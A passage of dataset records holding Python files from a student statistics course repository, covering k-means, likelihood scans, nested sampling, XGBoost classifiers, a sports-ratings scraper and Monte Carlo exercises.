max(norm_difference)\n difference_change = abs((largest_norm_difference - previous_difference) /\n np.mean([largest_norm_difference, previous_difference])) *100\n previous_difference = largest_norm_difference\n\n centroids = np.copy(centroids_new)\n print(difference_change)\n \n\n\n\n centroids = label_clusters(data, centroids, n)\n\n return data, centroids\n\n\n# Read file\n\nnp.random.seed(2)\nX_train, y_train_labels = loadlocal_mnist(\n images_path='digit-recognizer/train-images-idx3-ubyte',\n labels_path='digit-recognizer/train-labels-idx1-ubyte')\n\nX_test, y_test_labels = loadlocal_mnist(\n images_path='digit-recognizer/t10k-images-idx3-ubyte',\n labels_path='digit-recognizer/t10k-labels-idx1-ubyte')\n\ntrain = np.insert(X_train, 0, y_train_labels, axis=1)\ntrain = np.insert(train, 0, np.zeros(train.shape[0]), axis=1)\ntrain = train[:4000, :]\n\ntest = np.insert(X_test, 0, y_test_labels, axis=1)\ntest = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\ntest = test[:100, :]\n\n\ntrain, cent = K_means(train, 10)\n\n\nstart = time.time()\nprint(test)\nclassified = classify(test, cent)\nprint(classified)\nend = time.time()\n\n\naccuracy = get_accuracy(classified[:, 0], classified[:, 1])\nprint('Your accuracy is: ', accuracy)\nprint('Your error rate is: ', 1 - accuracy)\nprint('Time to classify: ', end - start)\n\ndisplay_digit(classified, 1)\nplt.show()\n" }, { "alpha_fraction": 0.5843035578727722, "alphanum_fraction": 0.6192324161529541, "avg_line_length": 28.730770111083984, "blob_id": "60cd26ebc191d717885ce1c12b2ff34e2db71e99", "content_id": "62e35e7032363e62dc3072d4e90d5bcc148c542f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2319, "license_type": "no_license", "max_line_length": 79, "num_lines": 78, "path": "/Week_3/Class_5/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef my_func(x, alpha, beta):\n result = 1 + alpha * x + beta * x ** 2\n return result\n\n\ndef norm_factor(beta):\n # Calculated using wolfram maybe create function to do this?\n result = 0.571583 * beta + 1.9\n return result\n\n\nalpha = 0.5\nbeta = 0.5\n\nmy_alphas = np.empty((1, 0))\nmy_betas = np.empty((1, 0))\n\nrandom.seed(142)\nn = 50\nfor _ in range(n):\n # Create my empty arrays\n x = np.empty((1, 0))\n N = 2000\n\n # Fill my arrays with random numbers\n for i in range(N):\n x_random = random.uniform(-0.95, 0.95)\n y_random = random.random()\n if y_random < my_func(x_random, alpha, beta) / norm_factor(beta):\n x = np.append(x, x_random)\n\n binwidth = 0.01\n alpha_scan = np.arange(0.1, 1 + binwidth, binwidth)\n beta_scan = np.arange(0.1, 1 + binwidth, binwidth)\n\n LLH = np.zeros((len(alpha_scan), len(beta_scan)))\n\n for i, scan_alpha in enumerate(alpha_scan, 0):\n for j, scan_beta in enumerate(beta_scan, 0):\n\n LLH[i, j] = np.sum(np.log(my_func(x, scan_alpha, scan_beta) /\n norm_factor(scan_beta)))\n\n ind = np.unravel_index(np.argmax(LLH, axis=None), LLH.shape)\n my_alphas = np.append(my_alphas, alpha_scan[ind[0]])\n my_betas = np.append(my_betas, alpha_scan[ind[1]])\n# print(my_alphas, my_betas)\n\n# Plot the numbers\nplt.plot(my_alphas, my_betas, marker='o', linestyle='None')\nplt.xlim(0, 1)\nplt.ylim(0, 1)\n\nbinwidth = 0.05\nn_bins = np.arange(min(my_alphas), max(my_alphas) + binwidth, binwidth)\nplt.figure(2)\nplt.axvline(x=np.mean(my_alphas)-np.std(my_alphas), ls = \"--\", color='#2ca02c')\nplt.axvline(x=np.mean(my_alphas)+np.std(my_alphas), ls = \"--\", color='#2ca02c')\nplt.hist(my_alphas, bins=n_bins)\n\nbinwidth = 0.05\nn_bins = np.arange(min(my_betas), max(my_betas) + binwidth, binwidth)\nplt.figure(3)\nplt.hist(my_betas, bins=n_bins)\nplt.axvline(x=np.mean(my_alphas)-np.std(my_alphas), ls = \"--\", color='#2ca02c')\nplt.axvline(x=np.mean(my_alphas)+np.std(my_alphas), ls = \"--\", color='#2ca02c')\n\nprint('Mean of alpha is: %8.2f' % (np.mean(my_alphas)))\nprint('STD of alpha is: %8.2f' % (np.std(my_alphas)))\nprint('Mean of beta is: %8.2f' % (np.mean(my_betas)))\nprint('STD of beta is: %8.2f' % (np.std(my_betas)))\n\nplt.show()\n" }, { "alpha_fraction": 0.5691592693328857, "alphanum_fraction": 0.6334754228591919, "avg_line_length": 25.597938537597656, "blob_id": "4d4115518b3b85b9f41263d53702f01a16b99f21", "content_id": "c7f9171f72b2960c17d301d0c14091ae0b6fb21f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2581, "license_type": "no_license", "max_line_length": 91, "num_lines": 97, "path": "/Exam_2019/Code/prob5.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport nestle\nimport scipy \n\nplt.style.use('bmh')\n\n\ndef Likelihood(theta):\n mu = 0.68\n sigma = 0.2\n temp1 = np.cos(theta[0]) * np.cos(theta[1])\n temp2 = 1 / (sigma * np.sqrt(2 * np.pi))\n temp3 = np.exp(- (theta[2] - mu) ** 2 / (2 * sigma ** 2))\n temp4 = np.cos(theta[0] / 2)\n\n my_function = 3 * (temp1 + temp2 * temp3 * temp4 + 3)\n\n return my_function\n\n\n# Define a function mapping the unit cube to the prior space.\n# This function defines a flat prior in [-5., 5.) in both dimensions.\ndef prior_transform(x):\n return 7 * np.pi * x # - 5.0\n\n\nx = np.arange(0, 7 * np.pi, 0.1)[np.newaxis]\ny = np.arange(0, 7 * np.pi, 0.1)\nz = np.arange(0, 3, 0.1)\n\n\n# plt.figure(1)\n# plt.imshow(Likelihood([x.T, y]), cmap='hot')\n# plt.show()\n\n# Run nested sampling.\nresult = nestle.sample(Likelihood, prior_transform, 3, npoints=1000, method='multi')\n\n\nresult.logz # log evidence\nresult.logzerr # numerical (sampling) error on logz\nresult.samples # array of sample parameters\nresult.weights # array of weights associated with each sample\n\nplt.figure(2)\nplt.plot(result.samples[400:, 0], result.samples[400:, 2], '.')\nplt.xlabel('$\\\\theta_{1}$')\nplt.ylabel('$\\\\theta_{3}$')\nplt.ylim(0, 3) \n# # plt.hist2d(result.samples[:, 0], result.samples[:, 1], weights=result.weights, bins=20)\nplt.show()\n\nprint('Best theta1', result.samples[-1, 0])\nprint('Best theta2', result.samples[-1, 1])\nprint('Best theta3', result.samples[-1, 2])\n\nbinwidth = 0.1\nmu_scan = np.arange(0.05, 7 * np.pi + binwidth, binwidth)\nsigma_scan = np.arange(0.05, 7 * np.pi + binwidth, binwidth)\n\n\nLLH = np.zeros((len(mu_scan), len(sigma_scan)))\n\nbest1 = 12.349165650011875\nbest2 = 6.781712075143268\nbest3 = 0.7898809313896807\n\nfor i, mu in enumerate(mu_scan, 0):\n for j, sigma in enumerate(sigma_scan, 0):\n theta = [mu, sigma, best3]\n LLH[i, j] = np.sum(np.log(Likelihood(theta)))\n\n\nplt.imshow(LLH, cmap='hot', origin='lower', extent=(0, 7 * np.pi, 0, 7 * np.pi))\nplt.xlabel('$\\\\theta_{1}$')\nplt.ylabel('$\\\\theta_{2}$')\nplt.show()\n\nbinwidth = 0.1\nmu_scan = np.arange(0.05, 7 * np.pi + binwidth, binwidth)\nsigma_scan = np.arange(0.05, 3 + binwidth, binwidth)\n\n\nLLH = np.zeros((len(mu_scan), len(sigma_scan)))\n\n\nfor i, mu in enumerate(mu_scan, 0):\n for j, sigma in enumerate(sigma_scan, 0):\n theta = [mu, best2, sigma_scan]\n LLH[i, j] = np.sum(np.log(Likelihood(theta)))\n\n\nplt.imshow(LLH.T, cmap='hot', origin='lower', extent=(0, 7 * np.pi, 0, 3))\nplt.xlabel('$\\\\theta_{1}$')\nplt.ylabel('$\\\\theta_{3}$')\nplt.show()\n\n" }, { "alpha_fraction": 0.5619967579841614, "alphanum_fraction": 0.6070853471755981, "avg_line_length": 16.27777862548828, "blob_id": "336b1f09c8690849ddffd6cd175c7d422619bed1", "content_id": "16a6fb094559c82f4c400c17ccda618275b1d6d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "no_license", "max_line_length": 66, "num_lines": 36, "path": "/Week_3/Class_6/markov_chain_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nstart = 100\nmu = 0.5 * start\nsigma = 1\n\nn = 100\n\n\n\nnew_x = np.array([])\n\n\nfor i in np.arange(n):\n temp = np.random.normal(mu, sigma, 1)\n mu = 0.5 * temp\n new_x = np.append(new_x, temp)\n\n\nnew_x_1 = np.array([])\nstart = -27\nmu = 0.5 * start\nsigma = 1\n\nfor i in np.arange(n):\n temp = np.random.normal(mu, sigma, 1)\n mu = 0.5 * temp\n new_x_1 = np.append(new_x_1, temp)\n\nplt.plot(np.arange(n), new_x, 'ko', markersize=1, label='prior')\nplt.plot(np.arange(n), new_x_1, 'ro', markersize=1, label='prior')\nplt.show()\n\nprint(np.mean(new_x[10::]))" }, { "alpha_fraction": 0.5995599627494812, "alphanum_fraction": 0.6362302899360657, "avg_line_length": 34.415584564208984, "blob_id": "db4424149ce028b7e74b0a65f4fc61ab14855a60", "content_id": "d03bb216e272cb7f1b2be4253971378b40b769e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2727, "license_type": "no_license", "max_line_length": 105, "num_lines": 77, "path": "/Problem_set_1/problem_set_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.use('bmh')\n\nmy_url = 'https://kenpom.com/index.php?y=2014'\nmy_page = requests.get(my_url)\n\nsoup = BeautifulSoup(my_page.text, 'html.parser')\n\nratings_table = soup.find(id='ratings-table')\n\nheaders = ratings_table.find(class_='thead2')\n\ntitles = headers.find_all('th')\n\nheader_titles = []\n\nfor title in titles:\n try:\n header_titles.append(title.contents[0].contents[0])\n except:\n header_titles.append(title.contents[0])\n\nprint(header_titles)\n\nbody = ratings_table.find_all('tbody')\nrows = body[0].find_all('tr')\n\nconferences = ['ACC', 'SEC', 'B10', 'BSky', 'A10']\nACC_AdjD = np.array([])\nSEC_AdjD = np.array([])\nB10_AdjD = np.array([])\nBSky_AdjD = np.array([])\nA10_AdjD = np.array([])\n\nfor row in rows:\n temp = row.find_all('td')\n if len(temp) == 0:\n pass\n else:\n if temp[2].contents[0].contents[0] in conferences:\n if str(temp[2].contents[0].contents[0]) == 'ACC':\n ACC_AdjD = np.append(ACC_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'SEC':\n SEC_AdjD = np.append(SEC_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'B10':\n B10_AdjD = np.append(B10_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BSky':\n BSky_AdjD = np.append(BSky_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'A10':\n A10_AdjD = np.append(A10_AdjD, float(temp[7].contents[0]))\n else:\n pass\n\n\nbinwidth = 0.5\nn_bins_1 = np.arange(min(ACC_AdjD), max(ACC_AdjD) + binwidth, binwidth)\nn_bins_2 = np.arange(min(SEC_AdjD), max(SEC_AdjD) + binwidth, binwidth)\nn_bins_3 = np.arange(min(B10_AdjD), max(B10_AdjD) + binwidth, binwidth)\nn_bins_4 = np.arange(min(BSky_AdjD), max(BSky_AdjD) + binwidth, binwidth)\nn_bins_5 = np.arange(min(A10_AdjD), max(A10_AdjD) + binwidth, binwidth)\nprint(n_bins_4)\n\nplt.hist(ACC_AdjD, bins=n_bins_1, alpha=0.9, color='blue', edgecolor='black', linewidth=1, label='ACC')\nplt.hist(SEC_AdjD, bins=n_bins_2, color='maroon', edgecolor='black', linewidth=1, label='SEC')\nplt.hist(B10_AdjD, bins=n_bins_3, alpha=0.9, color='yellow', edgecolor='black', linewidth=1, label='B10')\nplt.hist(BSky_AdjD, bins=n_bins_4, color='green', edgecolor='black', linewidth=1, label='BSky')\nplt.hist(A10_AdjD, bins=n_bins_5, alpha=0.7, color='grey', edgecolor='black', linewidth=1, label='A10')\nplt.title(\"The Adjusted Defense for 5 conferences\")\nplt.legend()\nplt.ylabel('Number of counts in bin')\nplt.xlabel('AdjD')\n\nplt.show()\n" }, { "alpha_fraction": 0.6582914590835571, "alphanum_fraction": 0.6934673190116882, "avg_line_length": 26.63888931274414, "blob_id": "d4fe6c8063988bbe6e1dc09289ae8030ddc5a230", "content_id": "e1b7e3e53cfa9bb3617ba64c603b7d0fd91cfba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 87, "num_lines": 36, "path": "/Week_7/Class_13/multinest.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport nestle\n\n\ndef Likelihood(theta):\n my_function = np.sin(theta[0]) * np.sin(theta[1])\n return my_function\n\n\n# Define a function mapping the unit cube to the prior space.\n# This function defines a flat prior in [-5., 5.) in both dimensions.\ndef prior_transform(x):\n return 5 * np.pi * x # - 5.0\n\n\nx = np.arange(0, 5 * np.pi, 0.1)[np.newaxis]\ny = np.arange(0, 5 * np.pi, 0.1)\n\nplt.figure(1)\nplt.imshow(Likelihood([x.T, y]), cmap='hot')\n# plt.show()\n\n# Run nested sampling.\nresult = nestle.sample(Likelihood, prior_transform, 2, npoints=1000, method='multi')\n\n\nresult.logz # log evidence\nresult.logzerr # numerical (sampling) error on logz\nresult.samples # array of sample parameters\nresult.weights # array of weights associated with each sample\n\nplt.figure(2)\n# plt.plot(result.samples[400:, 0], result.samples[400:, 1], '.')\nplt.hist2d(result.samples[:, 0], result.samples[:, 1], weights=result.weights, bins=20)\nplt.show()\n" }, { "alpha_fraction": 0.581250011920929, "alphanum_fraction": 0.634765625, "avg_line_length": 17.03521156311035, "blob_id": "6eaca2d678db7a284125642ad968841fee32587e", "content_id": "ee1ec5830d8e34ddd0086dc2deaccbd552adae6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2560, "license_type": "no_license", "max_line_length": 58, "num_lines": 142, "path": "/Problem_set_1/problem_set_bonus.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import PyPDF2\n\npdfFileObj = open('authors-acknowledgements-v5.pdf', 'rb')\npdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n\nprint(pdfReader.numPages)\n\npageObj = pdfReader.getPage(0)\n\ntext = pageObj.extractText()\n\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ndel temp_authors[0:14]\n\n\nauthors = []\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n \n### new page\n\npageObj = pdfReader.getPage(1)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\n### new page \n\npageObj = pdfReader.getPage(2)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\n\n\ndel temp_authors[0:2]\ndel temp_authors[877:886]\ndel temp_authors[960:963]\ndel temp_authors[1031]\ndel temp_authors[874]\ndel temp_authors[954]\ndel temp_authors[1026]\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\n### new page \n\npageObj = pdfReader.getPage(3)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ndel temp_authors[776:783]\ndel temp_authors[801:814]\ndel temp_authors[773]\ndel temp_authors[777]\ndel temp_authors[796]\ndel temp_authors[833:836]\ndel temp_authors[1178:1187]\ndel temp_authors[830]\ndel temp_authors[1174]\n# print(temp_authors.index('AND'))\n# print(temp_authors[1178:1187])\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\n### new page\n\npageObj = pdfReader.getPage(4)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ndel temp_authors[0:2]\ndel temp_authors[410:413]\ndel temp_authors[506:513]\ndel temp_authors[642:645]\ndel temp_authors[703:708]\ndel temp_authors[404]\ndel temp_authors[501]\ndel temp_authors[637]\ndel temp_authors[695]\ndel temp_authors[1171]\n# print(temp_authors.index('AND'))\n# print(temp_authors[703:708])\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\nprint(authors)" }, { "alpha_fraction": 0.5752381086349487, "alphanum_fraction": 0.6133333444595337, "avg_line_length": 34.47297286987305, "blob_id": "f49c5fe62b4f82f2edaaaeabf99f9d0d9548cd5d", "content_id": "1a60b6ddf3f019f196cd6c877f19fd39553ed9bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2625, "license_type": "no_license", "max_line_length": 107, "num_lines": 74, "path": "/Exam_2019/Code/Problem_4.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nimport matplotlib.pyplot as plt\n\nplt.style.use('bmh')\n\n\ndef convert_to_Dmatrix(X, y, features_names1):\n dmatrix = xgb.DMatrix(data=X, label=y, feature_names=features_names)\n return dmatrix, X, y\n\n\nfnames = ['Exam_2019_Prob4_TrainData.csv',\n 'Exam_2019_Prob4_TestData.csv',\n 'Exam_2019_Prob4_BlindData.csv']\n\ndata_dict = {}\nfeatures_names = []\nID_blind = []\n\nfor file in fnames:\n temp = pd.read_csv(file)\n if file == 'Exam_2019_Prob4_TrainData.csv':\n features_names = list(temp.iloc[:, 1:-1])\n elif file == 'Exam_2019_Prob4_BlindData.csv':\n ID_blind = temp.iloc[:, 0]\n data_dict[file[:-4]] = temp.iloc[:, 1:].values\n\n\ndmatrix_train, X_train, y_train = convert_to_Dmatrix(data_dict['Exam_2019_Prob4_TrainData'][:, :-1],\n data_dict['Exam_2019_Prob4_TrainData'][:, -1],\n features_names)\n\ndmatrix_test, X_test, y_test = convert_to_Dmatrix(data_dict['Exam_2019_Prob4_TestData'][:, :-1],\n data_dict['Exam_2019_Prob4_TestData'][:, -1],\n features_names)\n\n\nX_blind = data_dict['Exam_2019_Prob4_BlindData']\ndmatrix_blind = xgb.DMatrix(data=X_blind, \n feature_names=features_names)\n\n\nparam = {'max_depth': 2, 'eta': 1, 'silent': 1, 'objective': 'binary:logistic'}\nmodel = xgb.train(param, dmatrix_train, num_boost_round=12)\n\ny_pred = model.predict(dmatrix_test)\npredictions = [round(value) for value in y_pred]\n\naccuracy = accuracy_score(dmatrix_test.get_label(), predictions)\nprint(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\nbinwidth = 0.03\nn_bins = np.arange(min(y_pred[y_test==0]), max(y_pred[y_test==0]) + binwidth, binwidth)\nplt.hist(y_pred[y_test==0], bins=n_bins, color='r', histtype='step', label='No-show==0', lw=2)\nplt.hist(y_pred[y_test==1], bins=n_bins, color='k', histtype='step', label='No-show==1', lw=2)\nplt.xlabel('Decision score')\nplt.ylabel('Counts')\nplt.legend()\n\n\nxgb.plot_importance(model)\nplt.rcParams['figure.figsize'] = [5, 5]\nplt.show()\n\ny_pred = model.predict(dmatrix_blind)\npredictions = [round(value) for value in y_pred]\n\n\nID_blind = np.append(ID_blind.values[:, None], np.array(predictions)[:, None], axis=1)\nnp.savetxt('ramyar.AMAS_Exam_2019.Problem4.NoShowFalse.txt', ID_blind[ID_blind[:, 1] == 0][:, 0], fmt='%i')\nnp.savetxt('ramyar.AMAS_Exam_2019.Problem4.NoShowTrue.txt', ID_blind[ID_blind[:, 1] == 1][:, 0], fmt='%i')\n" }, { "alpha_fraction": 0.5640096664428711, "alphanum_fraction": 0.5821256041526794, "avg_line_length": 23.352941513061523, "blob_id": "d0c5a51e284297a714fb71054797a39cae4c2716", "content_id": "c0e23c77923a8a7e36396064a10b89a38502e2f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 828, "license_type": "no_license", "max_line_length": 81, "num_lines": 34, "path": "/Week_1/Class_1/Exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\nfile_name = 'FranksNumbers.txt'\n\nmy_file = open(file_name, 'r')\n\nmy_array = np.zeros((1,2))\nprint(my_array)\n\ncounter = -1\nrow_counter = 0\n\nfor line in my_file:\n\n current_line = line.split()\n if len(current_line) > 3:\n pass\n elif len(current_line) == 3:\n counter += 1\n my_array = np.expand_dims(my_array, axis = -1)\n print(my_array.shape)\n elif len(current_line) == 0:\n print('Empty Line!')\n else:\n temp_array = np.array([float(current_line[0]), float(current_line[1])])\n temp_array = np.expand_dims(temp_array, axis = 0)\n print(temp_array)\n print(my_array[:,:,0].shape)\n print(counter)\n my_array[:, :, counter] = np.stack((my_array[:, :, counter], temp_array))\n\n\nmy_array = np.delete(my_array, 0, 0)\nprint(my_array)\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5524271726608276, "avg_line_length": 16.457626342773438, "blob_id": "34164ace63c4d7fc9f622ae0de4c4d16adc93e65", "content_id": "3bb6f635018bbe0539cda5e1a00d5faa1ecc7a3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 57, "num_lines": 59, "path": "/Week_1/Class_2/least_squares.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\n\nx = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0])\ny = np.array([0.0, 0.8, 0.9, 0.1, -0.8, -1.0])\n\n\ndef poly1(x, a):\n\n return a * x\n\n\ndef poly2(x, a, b):\n\n return a * x + b * x ** 2\n\n\ndef poly3(x, a, b, c):\n\n return a * x + b * x ** 2 + c * x ** 3\n\n\ndef poly4(x, a, b, c, d):\n\n return a * x + b * x ** 2 + c * x ** 3 + d * x ** 4\n\n\na, b, c = curve_fit(poly3, x, y)[0]\n\n# plt.plot(x, y, marker='o', linestyle='None')\n# plt.plot(x, poly3(x, a, b, c))\n\n# plt.show()\n\n\ndef my_chisquare(observed, expected, sigma):\n chi = np.sum((observed - expected) ** 2 / sigma ** 2)\n\n return chi\n\n\nmu, sigma = 0, 0.1\ns = np.random.normal(mu, sigma, 100)\nlnspc = np.linspace(min(s), max(s), len(s))\n\na, b, c = curve_fit(poly3, s, lnspc)[0]\n\nbinwidth = 0.05\nn_bins = np.arange(min(s), max(s) + binwidth, binwidth)\nplt.hist(s, bins=n_bins, density='True')\n\nplt.plot(s, poly3(s, a, b, c))\n\nplt.show()\n\n\n\nprint(my_chisquare(y, poly3(x, a, b, c), 0.5))\n" }, { "alpha_fraction": 0.5832298398017883, "alphanum_fraction": 0.6111801266670227, "avg_line_length": 29.37735939025879, "blob_id": "0201f3aa522d38a91e8b067faae2595dbfe9d5de", "content_id": "6d721a4196c4031f6fbf9a49811d467bf9177f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3220, "license_type": "no_license", "max_line_length": 87, "num_lines": 106, "path": "/Week_6/Class_12/bdt_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\n\nplt.style.use('bmh')\ndef convert_to_Dmatrix(data_set_1, data_set_2):\n\n labels_1 = np.zeros((data_set_1.shape[0], 1))\n labels_2 = np.ones((data_set_2.shape[0], 1))\n\n X = np.vstack((data_set_1, data_set_2))\n y = np.vstack((labels_1, labels_2))\n\n dmatrix = xgb.DMatrix(data=X, label=y, feature_names=['x', 'y', 'z'])\n\n return dmatrix, X, y\n\n\n\nfnames = ['BDT_background_train.txt', 'BDT_signal_train.txt',\n 'BDT_background_test.txt', 'BDT_signal_test.txt']\n\ndata_dict = {}\n\nfor file in fnames:\n data_dict[file[:-4]] = np.loadtxt(file)\n\ndmatrix_train, X_train, y_train = convert_to_Dmatrix(data_dict['BDT_background_train'],\n data_dict['BDT_signal_train'])\ndmatrix_test, X_test, y_test = convert_to_Dmatrix(data_dict['BDT_background_test'],\n data_dict['BDT_signal_test'])\n\nparam = {'max_depth': 3, 'eta': 1, 'silent': 1, 'objective': 'binary:logistic'}\nmodel = xgb.train(param, dmatrix_train)\n\ny_pred = model.predict(dmatrix_test)\npredictions = [round(value) for value in y_pred]\n\naccuracy = accuracy_score(dmatrix_test.get_label(), predictions)\nprint(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\n\n# plt.style.use('bmh')\n\n# plt.figure(figsize=(15, 8))\n# plt.subplot(131)\n# plt.hist(data_bg[:, 0], label='Background X', alpha=0.9)\n# plt.hist(data_signal[:, 0], label='Signal X', alpha=0.7)\n# plt.legend()\n\n# plt.subplot(132)\n# plt.hist(data_bg[:, 1], label='Background Y', alpha=0.9)\n# plt.hist(data_signal[:, 1], label='Signal Y', alpha=0.7)\n# plt.legend()\n\n# plt.subplot(133)\n# plt.hist(data_bg[:, 2], label='Background Z', alpha=0.9)\n# plt.hist(data_signal[:, 2], label='Signal Z', alpha=0.7)\n# plt.legend()\n\n# plt.figure(figsize=(15, 5))\n# plt.subplot(131)\n# plt.plot(data_bg[:, 0], data_bg[:, 1], '.', label='X vs Y BG')\n# plt.plot(data_signal[:, 0], data_signal[:, 1], '.', label='X vs Y Signal')\n# plt.legend()\n\n# plt.subplot(132)\n# plt.plot(data_bg[:, 0], data_bg[:, 2], '.', label='X vs Z BG')\n# plt.plot(data_signal[:, 0], data_signal[:, 2], '.', label='X vs Z Signal')\n# plt.legend()\n\n# plt.subplot(133)\n# plt.plot(data_bg[:, 1], data_bg[:, 2], '.', label='Y vs Z BG')\n# plt.plot(data_signal[:, 1], data_signal[:, 2], '.', label='Y vs Z Signal')\n# plt.legend()\n# plt.show()\n\n\nbackground = np.array([])\nsignal = np.array([])\n\nfor i, prediction in enumerate(predictions):\n if prediction == 0:\n background = np.append(background, X_test[i])\n else:\n signal = np.append(signal, X_test[i])\n\ndata_bg = signal.reshape(int(len(signal) / 3), 3)\ndata_signal = background.reshape(int(len(background) / 3), 3)\n\nplt.figure()\nplt.plot(data_bg[:, 0], data_bg[:, 1], 'r.', label='X vs Y BG')\nplt.plot(data_signal[:, 0], data_signal[:, 1], 'b.', label='X vs Y Signal')\nplt.legend()\n\ndata_bg = data_dict['BDT_background_test']\ndata_signal = data_dict['BDT_signal_test']\n\nplt.figure()\nplt.plot(data_bg[:, 0], data_bg[:, 1], 'r.', label='X vs Y BG')\nplt.plot(data_signal[:, 0], data_signal[:, 1], 'b.', label='X vs Y Signal')\nplt.legend()\n\nplt.show()\n" }, { "alpha_fraction": 0.6247848272323608, "alphanum_fraction": 0.6609294414520264, "avg_line_length": 20.518518447875977, "blob_id": "1eadd39b4d45e562b5f5fa248f52354eee437a3f", "content_id": "1e571cc395d7e75ba560a1451b4bbe00d797972c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/Week_2/Class_4/bayes_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nk = 10\nbig_k = 100\nn = 60\n\n\ndef my_binomial_coefficient(n, k):\n result = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n return result\n\ndef my_hypergeo(k, K, n, N):\n result = my_binomial_coefficient(K, k) * my_binomial_coefficient(N - K, n - k) / my_binomial_coefficient(N, n)\n return result\n\n\nposterior = np.array([])\n\nfor i in np.arange(150, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n posterior = np.append(posterior, temp)\n\nplt.plot(np.arange(150, 2000), posterior)\nplt.show()\n" }, { "alpha_fraction": 0.5607560873031616, "alphanum_fraction": 0.5913591384887695, "avg_line_length": 21.219999313354492, "blob_id": "4943eba450b892fbe07176c12ca66f16fec27a9d", "content_id": "95bec0acdc2d64a7da96fd3c03b5a8c54d2490e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1111, "license_type": "no_license", "max_line_length": 55, "num_lines": 50, "path": "/Week_1/Class_2/mc_pi_multi.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nrandom.seed(142)\n\n# N is the number of throws per test and A is 